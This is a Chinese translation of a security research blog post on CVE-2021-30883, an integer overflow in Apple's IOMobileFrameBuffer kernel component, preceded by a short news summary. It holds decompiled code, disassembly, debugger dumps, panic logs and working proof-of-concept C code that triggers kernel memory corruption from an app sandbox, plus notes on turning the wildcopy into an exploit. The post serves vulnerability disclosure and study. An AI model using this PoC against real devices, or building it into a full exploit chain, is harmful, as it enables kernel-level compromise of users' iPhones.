目录导航
CVE-2021-30883
苹果周一发布了针对 iOS 和 iPad 的安全更新,以解决一个严重漏洞,该漏洞正在被广泛利用,这是该公司自今年年初以来在其产品中解决的第 17 个零日漏洞。
关于该缺陷和攻击性质的技术细节以及威胁行为者的身份仍然不可用,以允许大多数用户应用补丁并防止其他对手将漏洞武器化。这家 iPhone 制造商表示,它通过改进内存处理解决了这个问题。
分配标识符CVE-2021-30883的弱点涉及“IOMobileFrameBuffer”组件中的内存损坏问题,该问题可能允许应用程序以内核权限执行任意代码。苹果感谢一位匿名研究人员报告了该漏洞,并表示它“知道有报告称该问题可能已被积极利用。”
CVE-2021-30883 POC及分析
安全研究员 Saar Amar分享了更多细节和概念验证 (PoC) 漏洞利用,指出“这个攻击面非常有趣,因为它可以从应用程序沙箱(因此非常适合越狱)和许多其他进程访问,使得它链中 LPE 漏洞的一个很好的候选者。”
针对 IOMFB 漏洞的 Bindiff 和 POC,iOS 15.0.2
介绍
在上一个 iOS 安全更新 ( 15.0.2 ) 中,Apple 修复了IOMobileFrameBuffer/AppleCLCD 中的一个漏洞,他们指出该漏洞已被广泛利用 (CVE-2021-30883)。这个攻击面非常有趣,因为它可以从应用程序沙箱(因此非常适合越狱)和许多其他进程访问,使其成为链(WebContent 等)中 LPE 漏洞利用的良好候选者。
因此,我决定快速浏览一下,绑定补丁,并确定漏洞的根本原因。在bindiffing和reversing之后,我看到这个bug很棒,我决定写这篇简短的博文,希望对你有所帮助。我真的很想在尽可能接近补丁发布的情况下发布我的 bindiff 发现,所以这里不会有完整的漏洞利用;然而,我确实设法建立了一个非常好的和稳定的 POC,最终导致了极大的恐慌:)
漏洞
首先,让我们查看修补过的函数以了解漏洞。在补丁之前,在new_from_data 的不同流中,有一些不同的大小计算实例,没有检查整数溢出。这些函数尝试分配一个缓冲区,用于存储用户发送的表格内容。
让我们以IOMFB::TableCompensator::BilerpGainTable::new_from_data 为例。
在补丁之前,该函数如下所示:
__int64 __fastcall IOMFB::TableCompensator::BilerpGainTable::new_from_data(__int64 a1, __int64 a2, int a3, __int64 *a4, _QWORD *a5, int a6)
{
__int64 v_obj; // x19
__int64 v13; // x8
__int64 v14; // x22
int v15; // w8
unsigned int v16; // w23
__int64 v17; // x0
__int64 v18; // x8
__int64 v_idx; // x22
v_obj = operator new(0x60LL);
*(_BYTE *)(v_obj + 0x30) = 0;
*(_QWORD *)v_obj = off_FFFFFFF0078EF1D8;
*(_QWORD *)(v_obj + 0x58) = 0LL;
*(_DWORD *)(v_obj + 0x50) = a6;
*(_DWORD *)(v_obj + 0x54) = 0;
v13 = *a4;
*(_QWORD *)(v_obj + 0x38) = 0LL;
*(_QWORD *)(v_obj + 0x40) = v13;
*(_QWORD *)(v_obj + 0x48) = *a5;
*(_DWORD *)(v_obj + 0x10) = a3;
v14 = *(unsigned int *)(a1 + 0x140);
*(_DWORD *)(v_obj + 32) = v14;
if ( a3 )
v15 = a3;
else
v15 = 1;
v16 = v15 * v14;
v_chunk = kalloc_ext((unsigned int)(12 * v15 * v14 + 4 * (v14 + a3))); // <-- WOW!
*(_QWORD *)(v_obj + 40) = v_chunk;
v18 = v_chunk + 12LL * v16;
*(_QWORD *)(v_obj + 24) = v18;
*(_QWORD *)(v_obj + 8) = v18 + 4 * v14;
if ( a3 )
{
v_idx = 0LL;
while ( IOMFB::TableCompensator::BilerpGainTable::set_table(v_obj, v_idx, a1, a2) & 1 )
{
v_idx = (unsigned int)(v_idx + 1);
if ( (unsigned int)v_idx >= *(_DWORD *)(v_obj + 16) )
return v_obj;
}
(*(void (__fastcall **)(__int64))(*(_QWORD *)v_obj + 8LL))(v_obj);
v_obj = 0LL;
}
return v_obj;
}
每次我们看到整数计算时,我们需要小心并验证计算不能上溢或下溢。在我们的例子中,在这个函数或导致这个函数的调用堆栈中没有这样的检查。而且,最重要的是,大多数操作数完全由来自 EL0 的调用者控制 32 位。这意味着我们这里有一个经典的整数溢出。哦,计算是用 32 位完成的,而不是 64 位,这是一个很好的奖励。这是实际的代码:
FFFFFFF0098EF290 29 17 9F 1A CSINC W9, W25, WZR, NE
FFFFFFF0098EF294 09 7D 09 1B MUL W9, W8, W9
FFFFFFF0098EF298 96 01 80 52 MOV W22, #0xC
FFFFFFF0098EF29C 29 7D 16 1B MUL W9, W9, W22
FFFFFFF0098EF2A0 08 01 19 0B ADD W8, W8, W25
FFFFFFF0098EF2A4 20 09 08 0B ADD W0, W9, W8,LSL#2
FFFFFFF0098EF2A8 13 83 9D 97 BL kalloc_ext
该补丁修复了这个问题(提升到 64 位算术、上限检查等),并在此过程中添加了 NULL 检查。
POC
与往常一样,在构建 POC 并引发良好的恐慌之前,我们不能说我们有错误。我们可以看到该错误存在于AppleMobileDispH12P 中,它可以从AppleCLCD访问。在对流程进行一些逆向和基本了解之后,我们看到可以从外部方法 78 访问此函数。可以直接从应用程序沙箱访问此流程。与之前在 IOMFB/AppleCLCD 中的普遍存在的漏洞(阅读本文)不同,不需要特殊权限。您可以使用我的 POC 创建一个 iOS 应用程序,在设备上运行它并触发漏洞.
太好了,让我们找到这些函数的流程。我选择定位IOMFB::TableCompensator::BilerpGainTable::new_from_data。
正如我所说的,经过一番倒车,我看到有从流动IOMobileFramebufferUserClient :: s_set_block(第78 AppleCLCD)。
这个函数非常简单:它根据第一个标量参数调用不同的函数,这可能会继续处理包含更多“操作 ID/选择器”的用户输入,用于一些额外的 switch 语句。
我不会打扰你的细节,但为了触发IOMFB::TableCompensator::BilerpGainTable::new_from_data我只需要将第一个和第二个标量设置为 0,并将 structureInput 中的第一个 32 位值设置为 3。然后,为了验证我的反转,我在结构输入缓冲区的其余部分设置了 0x41s。通过在上面的代码片段中的 0xFFFFFFF0098EF290 上设置断点,我们可以看到 X5、X8、X20、X22 和 X25 是完全受控的 32 位整数,从结构输入中提取。惊人的!这是 0xFFFFFFF0098EF290 处通用寄存器的转储:
(lldb) reg read
General Purpose Registers:
x0 = 0xffffffe4cb6d95c0
x1 = 0x0000000000000060
x2 = 0x0000000000000040
x3 = 0x0000000000000060
x4 = 0x0000000000000000
x5 = 0x0000000041414141 // <-- controlled
x6 = 0xfffffff00991adac
x7 = 0x0000000000006eb1
x8 = 0x0000000041414141 // <-- controlled
x9 = 0x000000000000003a
x10 = 0xffffffe802080000
x11 = 0x3ffffff932db603a
x12 = 0x0000000000000000
x13 = 0x00000000000001dc
x14 = 0x0000000000004cb0
x15 = 0x0000000000008001
x16 = 0xffbee3f007a542d8
x17 = 0x182effe4cb6d95c0
x18 = 0x0000000000000000
x19 = 0xffffffe4cb6d95c0
x20 = 0x0000000041414141 // <-- controlled
x21 = 0xffffffe4cd563100
x22 = 0x0000000041414141 // <-- controlled
x23 = 0xffffffe4cd5630f4
x24 = 0xffffffe4cd5630ec
x25 = 0x0000000041414141 // <-- controlled
x26 = 0x0000000000000000
x27 = 0xffffffe818743648
x28 = 0xffffffe199b91608
x29 = 0xffffffe8187434b0
x30 = 0xfffffff0098ef23c
sp = 0xffffffe818743470
pc = 0xfffffff0098ef290
cpsr = 0x20400204
从这里开始,我们显然感到恐慌。
所以,我们在计算大小时有一个 32 位整数溢出!这个大小被传递给kalloc_ext,这意味着我们可以触发内存损坏,甚至控制区域(计算中的小限制)。在许多情况下,此类错误会导致野生复制,这使我们的漏洞利用变得更加有趣(一,二)。让我们深入了解一下我们的案例中发生了什么。
因此,我构建了以下 POC,这在我尝试过的 iOS 版本上引发了恐慌(我测试了 14.7.1 和 15.0,但该错误可能比那个更旧)。
poc-概念验证:
io_connect_t get_iomfb_uc(void) {
kern_return_t ret;
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
int type = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("AppleCLCD"));
if(service == MACH_PORT_NULL) {
printf("[-] failed to open service\n");
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD service: 0x%x\n", service);
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
if(ret != KERN_SUCCESS) {
printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
return shared_user_client_conn;
}
void do_trigger(io_connect_t iomfb_uc) {
kern_return_t ret;
size_t input_size = 0x180;
uint64_t scalars[2] = { 0 };
char *input = (char*)malloc(input_size);
if (input == NULL) {
perror("malloc input");
return;
}
memset(input, 0x41, input_size);
*(int*)input = 0x3;
ret = IOConnectCallMethod(iomfb_uc, 78,
scalars, 2,
input, input_size,
NULL, NULL,
NULL, NULL);
if (ret != KERN_SUCCESS) {
printf("s_set_block failed, ret == 0x%x --> %s\n", ret, mach_error_string(ret));
} else {
printf("success!\n");
}
free(input);
}
void poc(void) {
io_connect_t iomfb_uc = get_iomfb_uc();
if (iomfb_uc == MACH_PORT_NULL) {
return;
}
do_trigger(iomfb_uc);
IOServiceClose(iomfb_uc);
}
而且,恐慌(来自我的物理 iPhone X、iOS 14.7.1、18G82):
"build" : "iPhone OS 14.7.1 (18G82)",
"product" : "iPhone10,3",
...
"panicString" : "panic(cpu 5 caller 0xfffffff016de32d4): Kernel data abort. at pc 0xfffffff0172c4244, lr 0xfffffff0172c41b8 (saved state: 0xffffffe815d13110)
x0: 0xffffffe4ccd0a7c0 x1: 0x0000000000000000 x2: 0xffffffe4cd267700 x3: 0x0000000041414141
x4: 0x0000000000001804 x5: 0x0000000000000034 x6: 0xfffffff0172e6664 x7: 0x0000000000000000
x8: 0x0000000283b0de0c x9: 0x0000000388b5e310 x10: 0x0000000041414141 x11: 0x0000000000000000
x12: 0x0000000000000000 x13: 0x0000000000000046 x14: 0xfffffff0172a0ac0 x15: 0xfffffff017310ed0
x16: 0x0000000000000001 x17: 0x0000000000000002 x18: 0xfffffff016dd1000 x19: 0xffffffe4ccd0a7c0
x20: 0x0000000041414141 x21: 0xffffffe4cd267700 x22: 0x0000000000000000 x23: 0x0000000035a41281
x24: 0x000000000000000c x25: 0x0000000041414141 x26: 0xffffffe815d13638 x27: 0xffffffe4cd3d45b4
x28: 0xffffffe19a0d1478 fp: 0xffffffe815d134a0 lr: 0xfffffff0172c41b8 sp: 0xffffffe815d13460
pc: 0xfffffff0172c4244 cpsr: 0x60400204 esr: 0x96000046 far: 0x0000000388b5e310
...
Kernel slide: 0x000000000ece0000
Kernel text base: 0xfffffff015ce4000
而且,如果我们查看物理设备内核缓存中的0xfffffff0172c4244-0x000000000ece0000:
com.apple.driver.AppleMobileDispH10P:__text:FFFFFFF0085E4244 STR W3, [X9,W1,UXTW#2]
好吧,这很有趣。因为我们试图将控制值 (0x41414141) 写入虚拟地址 0x0000000388b5e310(这显然不是有效的内核地址),所以我们感到恐慌。实际上,这个值让我怀疑它是由分配失败引起的:kalloc_ext返回了 NULL(注意代码中没有对此进行检查),而new_from_data函数只是向新分配的块添加了一个偏移量(同样是 0x0 )。让我们看看这是怎么发生的:
错误指令位于函数IOMFB::TableCompensator::BilerpGainTable::set_table中,正如我们在第一个代码片段中看到的那样,它是从IOMFB::TableCompensator::BilerpGainTable::new_from_data 调用的。让我们看看set_table做了什么:
__int64 __fastcall IOMFB::TableCompensator::BilerpGainTable::set_table(__int64 obj, unsigned int idx, __int64 a3, int a4)
{
int v4; // w10
__int64 v5; // x9
__int64 v6; // x8
__int64 v7; // x11
unsigned __int64 v9; // x9
_DWORD *v10; // x10
_DWORD *v11; // x11
if ( *(_DWORD *)(obj + 0x10) <= idx )
return 0LL;
v4 = *(_DWORD *)(obj + 0x20);
if ( *(_DWORD *)(a3 + 0x140) != v4 )
return 0LL;
v5 = *(_QWORD *)(obj + 8);
v6 = *(_QWORD *)(obj + 0x18);
v7 = *(_QWORD *)(obj + 0x28);
if ( idx )
{
if ( *(_DWORD *)(v5 + 4LL * (idx - 1)) > a4 )
return 0LL;
}
*(_DWORD *)(v5 + 4LL * idx) = a4; // panic here
if ( *(_DWORD *)(obj + 32) )
{
v9 = 0LL;
v10 = (_DWORD *)(v7 + 12LL * v4 * idx);
v11 = (_DWORD *)(a3 + 8);
do
{
*(_DWORD *)(v6 + 4 * v9) = *(v11 - 2);
...
现在,被取消引用的地址是 *(X0+8),正如我们之前看到的,这是带有偏移量的分配(请记住,这里的操作数是受控的,在我的 POC 的情况下,是巨大的):
v_chunk = kalloc_ext((unsigned int)(12 * v15 * v14 + 4 * (v14 + a3)));
*(_QWORD *)(v_obj + 40) = v_chunk;
v18 = v_chunk + 12LL * v16;
*(_QWORD *)(v_obj + 24) = v18;
*(_QWORD *)(v_obj + 8) = v18 + 4 * v14;
和实际代码:
FFFFFFF0098EF290 29 17 9F 1A CSINC W9, W25, WZR, NE
FFFFFFF0098EF294 09 7D 09 1B MUL W9, W8, W9
FFFFFFF0098EF298 96 01 80 52 MOV W22, #0xC
FFFFFFF0098EF29C 29 7D 16 1B MUL W9, W9, W22
FFFFFFF0098EF2A0 08 01 19 0B ADD W8, W8, W25
FFFFFFF0098EF2A4 20 09 08 0B ADD W0, W9, W8,LSL#2
FFFFFFF0098EF2A8 13 83 9D 97 BL kalloc_ext <-- allocation
FFFFFFF0098EF2AC 60 16 00 F9 STR X0, [X19,#0x28]
FFFFFFF0098EF2B0 68 22 40 B9 LDR W8, [X19,#0x20]
FFFFFFF0098EF2B4 69 12 40 B9 LDR W9, [X19,#0x10]
FFFFFFF0098EF2B8 3F 01 00 71 CMP W9, #0
FFFFFFF0098EF2BC 2A 15 9F 1A CSINC W10, W9, WZR, NE
FFFFFFF0098EF2C0 4A 7D 08 1B MUL W10, W10, W8
FFFFFFF0098EF2C4 4A 01 B6 9B UMADDL X10, W10, W22, X0
FFFFFFF0098EF2C8 6A 0E 00 F9 STR X10, [X19,#0x18]
FFFFFFF0098EF2CC 48 09 08 8B ADD X8, X10, X8,LSL#2
FFFFFFF0098EF2D0 68 06 00 F9 STR X8, [X19,#8] <-- X8 is the faulted addr
并且,在 0xFFFFFFF0098EF2AC(其中 X0 是kalloc_ext的返回值):
Process 1 stopped
* thread #1, stop reason = breakpoint 1.1
frame #0: 0xfffffff0098ef2ac
-> 0xfffffff0098ef2ac: str x0, [x19, #0x28] <-- X0 is kalloc_ext()'s return value
0xfffffff0098ef2b0: ldr w8, [x19, #0x20]
0xfffffff0098ef2b4: ldr w9, [x19, #0x10]
0xfffffff0098ef2b8: cmp w9, #0x0 ; =0x0
Target 0: (No executable module.) stopped.
(lldb) reg read x0
x0 = 0x0000000000000000
极好的!这说明了一切。正如我所怀疑的,由于分配失败,之前的取消引用实际上是一个 NULL+偏移量。因此,为了利用,我们只需要选择不同的操作数,这些操作数会溢出到相对较小的数字。这将使分配成功,我们可能会开始破坏(大量)内存。
POC 可在 iOS 15.0 上运行,但也完全相同(在虚拟 iPhone 11 Pro、iOS 15.0 上测试):
一个有趣的重要说明是其他类中这些函数的其他实现也有这种整数溢出。据我所知,补丁也修复了这些问题。这并不奇怪,因为通常当我们看到一个代码模式自我重复时,它是一个内联函数/宏/等。
Exploitation
我只是绑定了这个错误,所以这篇博文中不会有完整的漏洞利用;但是,我们仍然可以大体上讨论野拷贝的利用并改进 POC 为利用奠定基础:) 但是在我们开始谈论野拷贝之前,让我先分享一些 POC,它们可以让我们更好地控制流程并触发良好的恐慌。
控制操作数
首先,让操作数取自的偏移量中设置任意值(而不是在整个输入中设置 0x41s)。这里没有什么令人兴奋的;它只是反转IOMFB::TableCompensator::BilerpGainTable::new_from_data的调用者函数。POC 中更新的部分:
...
memset(input, 0x0, input_size);
int *pArr = (int*)input;
pArr[0] = 0x3; // sub-sub selector
pArr[1] = 0xffffffff; // has to be non-zero
pArr[2] = 0x41414141;
pArr[3] = 0x42424242;
pArr[8] = 0x43434343;
pArr[89] = 0x44444444;
ret = IOConnectCallMethod(iomfb_uc, 78,
scalars, 2,
input, input_size,
NULL, NULL,
NULL, NULL);
...
这给出了以下寄存器(对于与上面相同的存根,虚拟 iPhone 11 Pro,iOS 14.7.1):
(lldb) reg read
General Purpose Registers:
x0 = 0xffffffe4cbaa4420
x1 = 0x0000000000000060
x2 = 0x0000000000000020
x3 = 0x0000000000000060
x4 = 0x0000000000000000
x5 = 0x0000000043434343 // <-- controlled
x6 = 0xfffffff00991adac
x7 = 0x0000000000006eb1
x8 = 0x0000000044444444 // <-- controlled
x9 = 0x000000000000000b
x10 = 0xffffffe802224000
x11 = 0x3ffffff932ea900b
x12 = 0x0000000000000000
x13 = 0x00000000000001dc
x14 = 0x0000000000003320
x15 = 0x0000000000008001
x16 = 0xffbd7ff007a542d8
x17 = 0x182effe4cbaa4420
x18 = 0x0000000000000000
x19 = 0xffffffe4cbaa4420
x20 = 0x0000000042424242 // <-- controlled
x21 = 0xffffffe4ccf02b00
x22 = 0x0000000043434343 // <-- controlled
x23 = 0xffffffe4ccf02af4
x24 = 0xffffffe4ccf02aec
x25 = 0x0000000041414141 // <-- controlled
x26 = 0x0000000000000000
x27 = 0xffffffe81869b648
x28 = 0xffffffe199dd5608
x29 = 0xffffffe81869b4b0
x30 = 0xfffffff0098ef23c
sp = 0xffffffe81869b470
pc = 0xfffffff0098ef290
cpsr = 0x20400204
更好的恐慌,即 – NOT a (NULL+offset) dereference
现在,我想做的第一件事是获得更好的恐慌:即恐慌表明我们可以以一种好的方式破坏记忆(好吧,对我们来说)。NULL+offset 的错误取消引用(具有小而有限的偏移量)只是一个 DOS,这对我们来说还不够好(这不是安全问题)。所以,如果我们只是将我的 POC 调整为如下所示:
memset(input, 0x41, input_size);
int *pArr = (int*)input;
pArr[0] = 0x3; // sub-sub selector
pArr[1] = 0xffffffff; // has to be non-zero
pArr[2] = 0x10008;
pArr[3] = 0x424242;
pArr[8] = 0x434343;
pArr[89] = 0x444444;
我们得到了更好的恐慌(再次,我的物理 iPhone X、iOS 14.7.1、18G82):
"build" : "iPhone OS 14.7.1 (18G82)",
"product" : "iPhone10,3",
...
"panicString" : "panic(cpu 5 caller 0xfffffff02747b2d4): Kernel data abort. at pc 0xfffffff02795c244, lr 0xfffffff02795c1b8 (saved state: 0xffffffe8042f3110)
x0: 0xffffffe4cb295da0 x1: 0x0000000000000000 x2: 0xffffffe4cd4d4700 x3: 0x0000000000424242
x4: 0xffffffe8042f32c0 x5: 0xffffffe8042f32bc x6: 0x0000000000000001 x7: 0x0000000000000009
x8: 0xffffffec51659980 x9: 0xffffffec5276aa90 x10: 0x0000000000444444 x11: 0xffffffe9049c0000
x12: 0x00000000004a0000 x13: 0x00000000ffdfffff x14: 0xfffffff028729000 x15: 0xaaaaaaaaaaaaaaab
x16: 0x0000002000000000 x17: 0xfffffff028729940 x18: 0xfffffff027469000 x19: 0xffffffe4cb295da0
x20: 0x0000000000424242 x21: 0xffffffe4cd4d4700 x22: 0x0000000000000000 x23: 0x0000000046662220
x24: 0x000000000000000c x25: 0x0000000000010008 x26: 0xffffffe8042f3638 x27: 0xffffffe4cd51df44
x28: 0xffffffe199c1d478 fp: 0xffffffe8042f34a0 lr: 0xfffffff02795c1b8 sp: 0xffffffe8042f3460
pc: 0xfffffff02795c244 cpsr: 0x60400204 esr: 0x96000046 far: 0xffffffec5276aa90
...
Kernel slide: 0x000000001f378000
Kernel text base: 0xfffffff02637c000
好多了。注意PC和之前一样(0xfffffff02795c244-0x000000001f378000==0xFFFFFFF0085E4244),但是这次dst基地址是X9=0xffffffec5276aa90。我们仍然在循环的第一个索引(X1=0)上崩溃,因为偏移量太大。那是因为我们没有明智地选择其他任意值。让我们解决这个问题。
更好的恐慌 – 经典野生复制的 POC
所以一切都很好,我们完全了解发生了什么。但这还不够。我们需要得到一个好的恐慌,表明我们破坏了任意内存(我们可以通过整形等控制)。写入未映射页面的恐慌是一个好的第一步,但还有更多的工作要做。因为看起来我们在这里进入了一个wildcopy情况,让我们选择好的参数,这样:
- 我们得到了一个“合理”的分配大小(尽管它可能仍然很高)
- 我们从分配中得到一个合理的偏移量
- 我们开始损坏内存并在一段时间后在未映射的页面上崩溃(即,我们在恐慌之前成功损坏了一些内存)
这对于通配符来说可能是一个很好的 POC。然后,我们只需要弄清楚如何停止野生复制并利用损坏(见下一节)。
所以,在这个新的 POC 中,分配大小仍然很大,但是分配确实成功了:
memset(input, 0x41, input_size);
int *pArr = (int*)input;
pArr[0] = 0x3; // sub-sub selector
pArr[1] = 0xffffffff; // has to be non-zero
pArr[2] = 0x10008;
pArr[3] = 0x424242;
pArr[8] = 0x434343;
pArr[89] = 0x10008;
和恐慌:
"build" : "iPhone OS 14.7.1 (18G82)",
"product" : "iPhone10,3",
...
"panicString" : "panic(cpu 5 caller 0xfffffff02585b2d4): Kernel data abort. at pc 0xfffffff025d3c270, lr 0xfffffff025d3c1b8 (saved state: 0xffffffe816513110)
x0: 0xffffffe4cc8dfcc0 x1: 0x0000000000000010 x2: 0xffffffe4cd012e00 x3: 0x0000000000424242
x4: 0xffffffe8165132c0 x5: 0xffffffe8165132bc x6: 0x0000000000000001 x7: 0x0000000000000009
x8: 0xffffffe904720300 x9: 0x000000000000af80 x10: 0xffffffe9047a4000 x11: 0xffffffe4cd0c2608
x12: 0x0000000063736944 x13: 0x00000000ffdfffff x14: 0xffffffe8044e8000 x15: 0xaaaaaaaaaaaaaaab
x16: 0x0000002000000000 x17: 0xfffffff026b09940 x18: 0xfffffff025849000 x19: 0xffffffe4cc8dfcc0
x20: 0x0000000000424242 x21: 0xffffffe4cd012e00 x22: 0x0000000000000010 x23: 0x0000000000100040
x24: 0x000000000000000c x25: 0x0000000000010008 x26: 0xffffffe816513638 x27: 0xffffffe4cd0f38d4
x28: 0xffffffe199edd478 fp: 0xffffffe8165134a0 lr: 0xfffffff025d3c1b8 sp: 0xffffffe816513460
pc: 0xfffffff025d3c270 cpsr: 0x80400204 esr: 0x96000047 far: 0xffffffe9047a4000
...
Kernel slide: 0x000000001d758000
Kernel text base: 0xfffffff02475c000
哦,新指令!实际上,与我们上次恐慌时的情况相差不远。我们在循环中崩溃(在IOMFB::TableCompensator::BilerpGainTable::set_table 中)。地址为 0xfffffff025d3c270-0x000000001d758000=0xfffffff0085e4270。循环如下(来自 iPhone X,iOS 14.7.1):
FFFFFFF0085E4264
FFFFFFF0085E4264 loop
FFFFFFF0085E4264 LDUR W12, [X11,#-8]
FFFFFFF0085E4268 STR W12, [X8,X9,LSL#2]
FFFFFFF0085E426C LDUR W12, [X11,#-4]
FFFFFFF0085E4270 STR W12, [X10] <-- panic here
FFFFFFF0085E4274 LDR W12, [X11]
FFFFFFF0085E4278 STR W12, [X10,#4]
FFFFFFF0085E427C LDR W12, [X11,#4]
FFFFFFF0085E4280 STR W12, [X10,#8]
FFFFFFF0085E4284 ADD X9, X9, #1 <-- inc index
FFFFFFF0085E4288 LDR W12, [X0,#0x20]
FFFFFFF0085E428C ADD X11, X11, #0x10
FFFFFFF0085E4290 ADD X10, X10, #0xC
FFFFFFF0085E4294 CMP X9, X12 <-- cmp index to cnt
FFFFFFF0085E4298 B.CC loop
我们可以看到关于这次崩溃的两个要点:
- X9(循环中的计数器)是 0xaf90(这个循环之前被调用了很多次)。
- X10,被取消引用的地址,被分页对齐 – 0xffffffe9047a4000。这意味着我们到达了一个非地图区域。
这几乎是我对经典的wildcopy 崩溃所期望的(当然,没有适当的形状&&exploit :))。
通配符利用
现在,让我们进入有趣的部分:停止通配符。正如我在之前的漏洞利用中所说,我们可以在这里采取不同的方法。让我们看一些例子:
- 依赖竞争条件——塑造堆并触发通配符,这样它就会破坏一些有用的目标结构,并在通配符使我们崩溃之前竞争一个不同的线程来使用这个损坏的结构来做一些事情(例如,构造其他原语,终止通配符等)。一个很好的例子可以在这里找到。
- 如果wildcopy循环/机制有一些逻辑可以在某些条件下停止循环,我们可以利用这些检查并在wildcopy破坏我们想要破坏的数据/结构后破坏wildcopy。这正是我在WSL 漏洞利用中采用的方法。这种技术可以使用许多不同的方法来实现,例如:
- 如果从不应更改的内存中进行双取,或者可以更改,但有检查到位(因此由于双取的存在不存在安全问题,但逻辑确实是双取) ,我们可以利用这种双重提取并打破循环。请记住,我们并不关心该功能是否会导致错误,只要这发生在我们破坏了所需的目标结构之后。
- 如果wildcopy循环在每次迭代中都调用了一个虚函数,并且该函数指针存储在堆上的一个结构中(或在wildcopy期间我们可能会破坏的其他内存地址),则漏洞利用可以使用循环覆盖和在通配符期间转移执行。
在我们的特殊情况下,我看到了一些基于逻辑从内存中读取的值的检查(例如,在我们在IOMFB::TableCompensator::BilerpGainTable::set_table 中得到第一个恐慌之前检查分支)。请记住,只要set_table返回 value != 0,new_from_data 中的循环就会继续运行(即,wildcopy 继续运行)。你可以再看看这篇博文开头的反编译代码。所以任何从set_table返回 0 的分支都有利于我们停止通配符。记住这一点以备后用;这很重要!
另一个重要的点:set_table从内存中获取的一些值将是 OOB:记住,我们分配了一个非常小的内存块(大小仅 32 位),我们将其视为 >4GB。
所以,我想要做的是在某个时间点(当然,在某些数据已损坏之后)更改一个已检查的值并停止复制。有很多方法可以做到这一点,但我认为最简单的方法之一是塑造内核堆,以便在共享内存之前分配易受攻击的块,我们可以在任意时间从 EL0 更改共享内存。同样,补丁刚刚发布,所以我显然还没有测试它,但只是我发现在许多类似情况下非常有用的一个想法。
大恐慌!
所以,正如我所说,我们应该建立一个良好的形状并使用我提到的条件分支来阻止野复制。这些分支使用从 OOB 读取的值,我们可以对堆进行整形,因此我们将从共享内存/受控内存/等读取这些值。具体示例,请查看我上面链接的 WSL 漏洞利用。
问题是我想在尽可能接近补丁发布的时候发布这篇博文,所以我现在不会这样做。相反,我想出了一个很好的主意,碰巧效果很好(令人惊讶)。我在物理设备(iPhone X、iOS 14.7.1)和虚拟设备(iPhone 11 Pro、iOS 15.0)上连续测试了 5 次,并且每次都以相同的方式在两种设备上运行。所以,鉴于它有 100% 的成功率,而且我总是得到我想要的同样的恐慌,我也会在这里分享它:)
在深入的想法之前,让我们只记住,new_from_data电话set_table在一个循环中,如果调用的一个set_table返回0,我们摆脱困境。此外,set_table在开始时做了一些条件分支,然后才开始复制循环。并且,如果这些条件分支之一未通过,则 set_table 返回 0。如果它们都通过,则复制循环开始。您可以在本博文开头的反编译代码中清楚地看到这一点。
因此,想法很简单:让我们选择具有以下属性的数字:
- 进行溢出计算以产生一个小而通用的大小(我选择了 0x44)
- 使wildcopy由许多循环构建,每个循环复制少量字节,而不是少量循环,每次复制大量字节。这显着增加了可以让我们摆脱通配副本的检查次数,我们只能希望堆中的随机内容将我们从副本中解脱出来(同样,适当的整形会以正确的方式做到这一点,但是补丁在 2 小时前发布了。所以,让我们测试一下:P)。
事实证明,这种方法“太有效了”,因为在大多数情况下,我们过早地退出了应对循环(即我们写了很少量的字节 OOB 分配),并且,在一个在少数情况下,我们会退出函数并在损坏开始之前停止(然后,没有任何崩溃)。但是在我连续运行几次 POC 应用程序之后,我得到了我想要的好恐慌!所以,我只是把它包裹在一个循环中,我想要的好恐慌一直在发生!
我还在set_table的“return 0”中设置了一个断点,我看到了这种情况。您还可以使用调试器查看每次调用s_set_block 时确切损坏的字节数。
现在,到 POC!通过逆向调试,很容易看出 pArr[89] 是IOMFB::TableCompensator::BilerpGainTable::set_table 中复制循环的迭代次数。因此,我选择了在new_from_data中为我提供了大量迭代的数字,每个都在set_table 中调用一个小循环,并且整数溢出导致 0x44。通过更改 POC 中的相关部分:
// we control the content we are corrupting with
memset(input, 0x41, input_size);
int *pArr = (int*)input;
pArr[0] = 0x3; // sub-sub selector
pArr[1] = 0xffffffff; // has to be non-zero
pArr[2] = 0x40000001; // #iterations in the outer loop (new_from_data)
pArr[3] = 2;
pArr[8] = 2;
pArr[89] = 4; // #iterations in the inner loop (set_table)
/* each call trigger a flow with a lot of calls to set_table(), while
each set_table() flow will do a loop of only 4 iterations*/
for (size_t i = 0; i < 0x10000; ++i) {
ret = IOConnectCallMethod(iomfb_uc, 78,
scalars, 2,
input, input_size,
NULL, NULL,
NULL, NULL);
}
而且,在物理设备 iPhone X 14.7.1 上,我总是感到恐慌(它在虚拟 iPhone 11 Pro 14.7.1/15.0 上的行为完全相同):
"build" : "iPhone OS 14.7.1 (18G82)",
"product" : "iPhone10,3",
...
"panicString" : "panic(cpu 5 caller 0xfffffff01ad1d050): [kext.kalloc.80]: element modified after free (off:0, val:0x4141414141414141, sz:80, ptr:0xffffffe4cb9780f0, prot:zero)
0: 0x4141414141414141
8: 0x4141414141414141
...
Kernel slide: 0x0000000012c1c000
Kernel text base: 0xfffffff019c20000
是的!极好的!同样的恐慌发生在虚拟 iPhone 11 Pro、15.0、19A344 上:
panic(cpu 4 caller 0xfffffff0083441dc): [default.kalloc.80]: element modified after free (off:0, val:0x4141414141414141, sz:80, ptr:0xffffffe379503430)
0: 0x4141414141414141
8: 0x4141414141414141
Debugger message: panic
Device: D421
Hardware Model: iPhone12,3
我不得不承认,看到这个技巧如此有效让我很高兴:)
总结
我希望您喜欢阅读这篇博文,并且我设法阐明了上次 iOS 更新。
此外,如您所见,Corellium在这段短暂的旅程中是非常宝贵的资产。轻松调试内核的能力非常棒,它为我节省了很多时间。而且,当然,虚拟设备上的行为在物理设备上完全相同,只有 0 次更改。
材料和版本
我在此处展示的 POC 在 iOS 14.7.1-15.0.1 上的工作原理完全相同。对于更早的版本可能也是如此,但我只检查了 14.7.1-15.0.1。请注意,在不同的设备/版本上,某些常量可能会有所不同。我专门写了我测试过的设备/版本,它看起来是一致的,但在旧版本上可能会有所不同。只是为了好玩,我也在 iPhone 11 Pro Max、iOS 15.0 上检查了它,它的工作原理是一样的 🙂
POC 的代码可以在这个repo 中找到。
历史漏洞信息
